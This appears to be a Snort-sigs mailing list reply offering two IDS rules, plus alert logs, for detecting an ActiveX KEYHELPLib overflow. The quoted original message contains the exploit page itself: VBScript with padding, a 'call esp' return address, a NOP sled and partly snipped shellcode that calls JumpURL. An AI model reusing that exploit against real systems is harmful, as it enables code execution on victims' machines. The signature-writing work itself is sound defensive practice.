Hi Bob,<div><br></div><div>I was able to successfully detect the content you were looking for using 2.9.2.1, 2.9.2.2, and 2.9.2.3 all with the default snort.conf using the rules below.</div><div><br></div><div>I hope this is of some help.</div>
<div><br></div><div><div><div>alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ActiveX KEYHELPLib overflow attempt"; flow:to_client,established; file_data; content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only; pcre:"/eip\s*=\s*unescape\x28(?P<q1>[\x22\x27]?)%?67%41%41%7e(?P=q1)\s*\x29/smi"; classtype:attempted-user; sid:1010000; rev:1;)</div>
<div><br></div><div>alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ActiveX KEYHELPLib overflow attempt"; flow:to_client,established; file_data; content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only; content:"eip = unescape(|22|%67%41%41%7e|22|)"; nocase; classtype:attempted-user; sid:1010001; rev:1;)</div>
</div></div><div><br></div><div>Here they are again unfolded:</div><div><br></div><div><div><div>alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>msg:"ActiveX KEYHELPLib overflow attempt"; \</div>
<div><span class="Apple-tab-span" style="white-space:pre">      </span>flow:to_client,established; \</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>file_data; \</div><div><span class="Apple-tab-span" style="white-space:pre"> </span>content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only; \</div>
<div><span class="Apple-tab-span" style="white-space:pre">      </span>pcre:"/eip\s*=\s*unescape\x28(?P<q1>[\x22\x27]?)%?67%41%41%7e(?P=q1)\s*\x29/smi"; \</div><div><span class="Apple-tab-span" style="white-space:pre">  </span>classtype:attempted-user; \</div>
<div><span class="Apple-tab-span" style="white-space:pre">      </span>sid:1010000; rev:1; \</div><div>)</div><div>alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \</div><div><span class="Apple-tab-span" style="white-space:pre">      </span>msg:"ActiveX KEYHELPLib overflow attempt"; \</div>
<div><span class="Apple-tab-span" style="white-space:pre">      </span>flow:to_client,established; \</div><div><span class="Apple-tab-span" style="white-space:pre">        </span>file_data; \</div><div><span class="Apple-tab-span" style="white-space:pre"> </span>content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only; \</div>
<div><span class="Apple-tab-span" style="white-space:pre">      </span>content:"eip = unescape(|22|%67%41%41%7e|22|)"; nocase; \</div><div><span class="Apple-tab-span" style="white-space:pre">  </span>classtype:attempted-user; \</div>
<div><span class="Apple-tab-span" style="white-space:pre">      </span>sid:1010001; rev:1; \</div><div>)</div></div><div><br></div><div><div>10/13-09:55:36.078000  [**] [1:1010001:1] ActiveX KEYHELPLib overflow attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} <a href="http://204.15.227.178:80">204.15.227.178:80</a> -> <a href="http://192.168.0.1:23031">192.168.0.1:23031</a></div>
<div>***A**** Seq: 0x91B  Ack: 0xC33  Win: 0x16D0  TcpLen: 20</div><div>10/13-09:55:36.078000  [**] [1:1010000:1] ActiveX KEYHELPLib overflow attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} <a href="http://204.15.227.178:80">204.15.227.178:80</a> -> <a href="http://192.168.0.1:23031">192.168.0.1:23031</a></div>
<div>***A**** Seq: 0x91B  Ack: 0xC33  Win: 0x16D0  TcpLen: 20</div><div>10/13-09:55:36.078000  [**] [1:1010001:1] ActiveX KEYHELPLib overflow attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} <a href="http://204.15.227.178:80">204.15.227.178:80</a> -> <a href="http://192.168.0.1:5414">192.168.0.1:5414</a></div>
<div>***A**** Seq: 0xBC3  Ack: 0x8DB  Win: 0x16D0  TcpLen: 20</div><div>10/13-09:55:36.078000  [**] [1:1010000:1] ActiveX KEYHELPLib overflow attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} <a href="http://204.15.227.178:80">204.15.227.178:80</a> -> <a href="http://192.168.0.1:5414">192.168.0.1:5414</a></div>
<div>***A**** Seq: 0xBC3  Ack: 0x8DB  Win: 0x16D0  TcpLen: 20</div></div><div><br></div><div class="gmail_quote">On Fri, May 18, 2012 at 1:52 PM, Bob Huber <span dir="ltr"><<a href="mailto:roberthuberjr@...1477...4..." target="_blank">roberthuberjr@...144...</a>></span> wrote:<br>
<blockquote class="gmail_quote" style="margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex"><div><div style="font-size:10pt;font-family:arial,helvetica,sans-serif">
<div>I'm trying to write a sig for this ActiveX overflow:</div><div><br></div><div><div><html></div><div><body></div><div><object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib' /></div>
<div></object></div><div><script language='vbscript'></div><div>//executing calc</div><div>scode =      unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _</div><div>             ...SNIP...</div>
<div>             unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")</div><div>jnk = string(537,"A")</div><div>eip = unescape("%67%41%41%7e") '0x7E414167      call esp user32.dll</div>
<div>nop = string(16,unescape("%90"))</div><div>mapID=1</div><div>pstrChmFile= jnk + eip + nop + scode</div><div>pstrFrame="aaaaaaaa"</div><div>'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame</div>
<div>KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame</div><div></script></div><div></body></div><div></html></div><div><br></div><div>The problem I'm having is trying to get a content match off of the line -    eip = unescape("%67%41%41%7e")</div>
<div>I can't figure out how to match that content.  I'm running both 2.8.5 and 2.9.2.  I was assuming it would see the <script> tag and it would try to decode javascript, and maybe that was the problem.  I've tried file_data, I've tried pkt_data. I've turned off javascript normalization, I've turned off extended_response_inspection.  No luck.</div>
<div><br></div><div>Any help appreciated.</div><span class="HOEnZb"><font color="#888888"><div><br></div><div>Bob</div></font></span></div></div></div><br>------------------------------------------------------------------------------<br>
Live Security Virtual Conference<br>Exclusive live event will cover all the ways today's security and<br>threat landscape has changed and how IT managers can respond. Discussions<br>will include endpoint security, mobile security and the latest in malware<br>
threats. <a href="http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/" target="_blank">http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/</a><br>_______________________________________________<br>Snort-sigs mailing list<br>
<a href="mailto:Snort-sigs@lists.sourceforge.net">Snort-sigs@...639...forge.net</a><br><a href="https://lists.sourceforge.net/lists/listinfo/snort-sigs" target="_blank">https://lists.sourceforge.net/lists/listinfo/snort-sigs</a><br>
<a href="http://www.snort.org/" target="_blank">http://www.snort.org</a><br><br><br>Please visit <a href="http://blog.snort.org/" target="_blank">http://blog.snort.org</a> for the latest news about Snort!<br></blockquote>
<div><br></div></div></div>